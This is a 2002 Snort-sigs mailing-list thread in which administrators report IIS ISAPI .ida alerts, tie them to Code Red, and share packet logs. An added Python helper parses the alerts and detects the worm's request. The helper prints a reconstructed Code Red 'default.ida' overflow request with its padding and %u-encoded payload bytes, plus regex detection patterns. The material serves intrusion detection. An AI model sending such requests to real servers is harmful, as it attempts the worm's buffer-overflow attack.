[Snort-sigs] RE: ISAPI WORM

Robert Wagner rwagner at ...447...
Mon Apr 8 07:54:26 EDT 2002


This sounds like the original Code Red - based on the "Hacked By Chinese!"
I am thinking we need a better ISAPI definition.

-----Original Message-----
From: PM Systems - Rick Woehler [mailto:RWoehler at ...493...]
Sent: Monday, April 08, 2002 9:51 AM
To: Robert Wagner; snort-sigs at lists.sourceforge.net
Subject: RE: ISAPI WORM


I'm seeing this too and had just posted it to another list.  It has been
building over the last two weeks or so but I've had over 600+ alerts just
this morning.

 
Rick 



-----Original Message-----
From: Robert Wagner [mailto:rwagner at ...447...]
Sent: Monday, April 08, 2002 10:45 AM
To: snort-sigs at lists.sourceforge.net
Subject: ISAPI WORM


I noticed this worm coming through.  This is being picked up with:
Apr  8 05:05:05 xserver02 snort: [1:1243:2] WEB-IIS ISAPI .ida attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 61.142.131.43:1616 -> 208.44.159.30:80

Does anyone have a name for this worm?


[**] WEB-IIS ISAPI .ida attempt [**]
04/08-04:05:05.333278 61.142.131.43:1616 -> ME:80
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:1504
***AP*** Seq: 0x72BB3CCB  Ack: 0xD9983EDF  Win: 0x4470  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-MISC 403 Forbidden [**]
04/08-04:05:05.333278 ME:80 -> 61.142.131.43:1616
TCP TTL:125 TOS:0x0 ID:13941 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x72BB3CCB  Ack: 0xD9983EDF  Win: 0x4470  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/08-04:05:05.693278 61.142.131.43:1616 -> ME:80
TCP TTL:114 TOS:0x0 ID:50929 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0xD9983EDF  Ack: 0x72BB3CCB  Win: 0x4470  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/08-04:05:05.693278 ME:80 -> 61.142.131.43:1616
TCP TTL:125 TOS:0x0 ID:13943 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x72BB4833  Ack: 0xD9983EDF  Win: 0x0  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/08-04:05:05.703278 61.142.131.43:1616 -> ME:80
TCP TTL:114 TOS:0x0 ID:50930 IpLen:20 DgmLen:1155 DF
***AP*** Seq: 0xD9984493  Ack: 0x72BB3CCB  Win: 0x4470  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/08-04:05:05.703278 ME:80 -> 61.142.131.43:1616
TCP TTL:125 TOS:0x0 ID:13944 IpLen:20 DgmLen:40
*****R** Seq: 0x72BB3CCB  Ack: 0x72BB3CCB  Win: 0x0  TcpLen: 20
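A small triage helper for alerts like the one quoted in this thread, added here as an example (it is not code from the posters or from the Snort project): it parses Snort's syslog alert line, counts alerts per source so a burst like the 600+ Rick mentions stands out, and labels a captured request line as Code Red style when it carries the long single-letter pad after default.ida? followed by %u-encoded bytes. The sid, message and the 61.142.131.43 / 208.44.159.30 addresses come from the thread; the 10.0.0.5 source, the extra timestamps, the pad and token thresholds and the alert threshold are constructed for the example.

```python
"""Triage helper for Snort syslog alerts of the kind quoted in this thread.

Added example; not code from the thread's posters or from the Snort project.
Alert layout (Snort's syslog output, as in the quoted line):
  snort: [gid:sid:rev] msg [Classification: c] [Priority: p]: {PROTO} src:sport -> dst:dport
"""
import re
from collections import Counter

ALERT_RE = re.compile(
    r"snort: \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.+?) "
    r"\[Classification: (?P<cls>[^\]]+)\] \[Priority: (?P<pri>\d+)\]: "
    r"\{(?P<proto>\w+)\} (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)

# Request shape seen in the capture: "GET /default.ida?" + a long run of one
# padding letter + %uXXXX-encoded bytes.  The pad length (100) and the minimum
# number of %u tokens (4) are thresholds chosen for this example.
IDA_PATH_RE = re.compile(r"^GET\s+(?P<path>\S*?\.ida)\?(?P<query>.*)", re.IGNORECASE)
PAD_RE = re.compile(r"^([A-Za-z])\1{99,}")
UNICODE_RE = re.compile(r"%u[0-9A-Fa-f]{4}")


def parse_alert(line):
    """Return the alert fields as a dict, or None if the line is not a Snort alert."""
    m = ALERT_RE.search(line)
    if m is None:
        return None
    rec = m.groupdict()
    for key in ("gid", "sid", "rev", "pri", "sport", "dport"):
        rec[key] = int(rec[key])
    return rec


def classify_ida_request(request_line):
    """Label a request line 'code-red-style', 'ida-probe' (any .ida hit) or 'other'."""
    m = IDA_PATH_RE.match(request_line)
    if m is None:
        return "other"
    query = m.group("query")
    pad = PAD_RE.match(query)
    pad_len = len(pad.group(0)) if pad else 0
    if pad_len >= 100 and len(UNICODE_RE.findall(query)) >= 4:
        return "code-red-style"
    return "ida-probe"


def summarize(lines, threshold):
    """Count alerts per source and per signature; list sources at or above threshold."""
    by_src, by_sid = Counter(), Counter()
    for line in lines:
        rec = parse_alert(line)
        if rec is None:
            continue  # not a Snort alert line; skip it
        by_src[rec["src"]] += 1
        by_sid[(rec["sid"], rec["msg"])] += 1
    noisy = sorted(src for src, n in by_src.items() if n >= threshold)
    return {"by_src": by_src, "by_sid": by_sid, "noisy_sources": noisy}


# Constructed sample input.  The first line is the syslog alert from the thread;
# 10.0.0.5 and the extra timestamps are made up for the example.
_ALERT = ("snort: [1:1243:2] WEB-IIS ISAPI .ida attempt [Classification: Web "
          "Application Attack] [Priority: 1]: {TCP} %s -> 208.44.159.30:80")
SAMPLE_ALERTS = [
    "Apr  8 05:05:05 xserver02 " + _ALERT % "61.142.131.43:1616",
    "Apr  8 05:05:09 xserver02 " + _ALERT % "61.142.131.43:1702",
    "Apr  8 05:06:40 xserver02 " + _ALERT % "61.142.131.43:1988",
    "Apr  8 05:07:11 xserver02 " + _ALERT % "10.0.0.5:4021",
    "Apr  8 05:07:12 xserver02 sshd[812]: Accepted publickey for ops",
]
# Request line reconstructed in the shape of the capture: 224 'N's then %u tokens.
SAMPLE_REQUEST = ("GET /default.ida?" + "N" * 224
                  + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090"
                  + "%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0")

if __name__ == "__main__":
    report = summarize(SAMPLE_ALERTS, threshold=3)
    print("alerts per source:", dict(report["by_src"]))
    print("noisy sources:", report["noisy_sources"])
    print("request label:", classify_ida_request(SAMPLE_REQUEST))
```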